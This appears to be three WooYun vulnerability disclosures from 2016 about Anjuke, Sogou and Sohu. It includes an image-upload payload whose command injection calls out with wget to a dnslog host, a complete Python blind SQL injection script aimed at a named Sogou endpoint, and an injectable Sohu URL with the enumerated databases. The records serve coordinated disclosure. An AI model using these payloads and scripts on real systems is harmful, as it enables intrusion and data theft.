漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：我也要刷一下：）详细说明：问题出现在头像上传的地方利用代码：push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|wget http://99fbe5.dnslog.info/")'pop graphic-context保存为JPG，用cloudeye来进行测试成功因为没有公网IP测试，所以就不做shell测试了漏洞证明：问题出现在头像上传的地方利用代码：push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|wget http://99fbe5.dnslog.info/")'pop graphic-context保存为JPG，用cloudeye来进行测试成功因为没有公网IP测试，所以就不做shell测试了修复方案： 版权声明：转载请注明来源 沦沦@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-05 20:47厂商回复：感谢对安居客的支持！最新状态：暂无

漏洞详情披露状态： 2016-04-23： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：一小乞丐在拾荒时捡到个神灯，他擦了擦竟然出来了个灯神。灯神对小乞丐说能满足他一个愿望，小乞丐想了想对灯神说：我想要士力架！话刚说完，小乞丐的下面就留出了鲜红的血液，小乞丐无助的望着灯神，灯神无奈的对他说：是你要试的……详细说明：站点：t.cp.sogou.com 为True时：为Flase时：database()长度为10 漏洞证明：# -*- coding: utf8 -*-#encoding=utf-8import httplibimport timeimport stringimport sysimport urllibimport urllib2headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','Content-Type':'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive MySQL database()' % time.strftime('%H:%M:%S', time.localtime())database = ''for i in range(1,11,1):for payload in payloads:try:params = urllib.urlencode({'lotType': 'guangdong where ascii(substr(database(),'+str(i)+',1))='+str(ord(payload))+'#'})conn = httplib.HTTPConnection('t.cp.sogou.com', timeout=20)conn.request(method='POST', url="/yllt/ylltTool11x5/ltTool11x5/dataFile.php",body=params,headers=headers)status = conn.getresponse().statusif status == 500:database += payloadprint '\r[scan in progress]' ,database time.sleep(0.01)breakconn.close()except Exception, e:print eprint ''print 'database() is', database修复方案：预编译处理版权声明：转载请注明来源 Vinc@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-27 18:42厂商回复：感谢支持最新状态：暂无

漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：“老公，如果哪天我难受想去医院，而你LOL刚开局，你选哪个？”“选亚索吧，我亚索玩的比较好。”详细说明：http://live.k.sohu.com/api/function/getChannelPackageUrl.go?channelId=1003漏洞证明： available databases [3]:[*] information_schema[*] live[*] mpaper_cms2修复方案：修复吧版权声明：转载请注明来源 Vinc@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：12确认时间：2016-04-28 19:50厂商回复：感谢支持。最新状态：暂无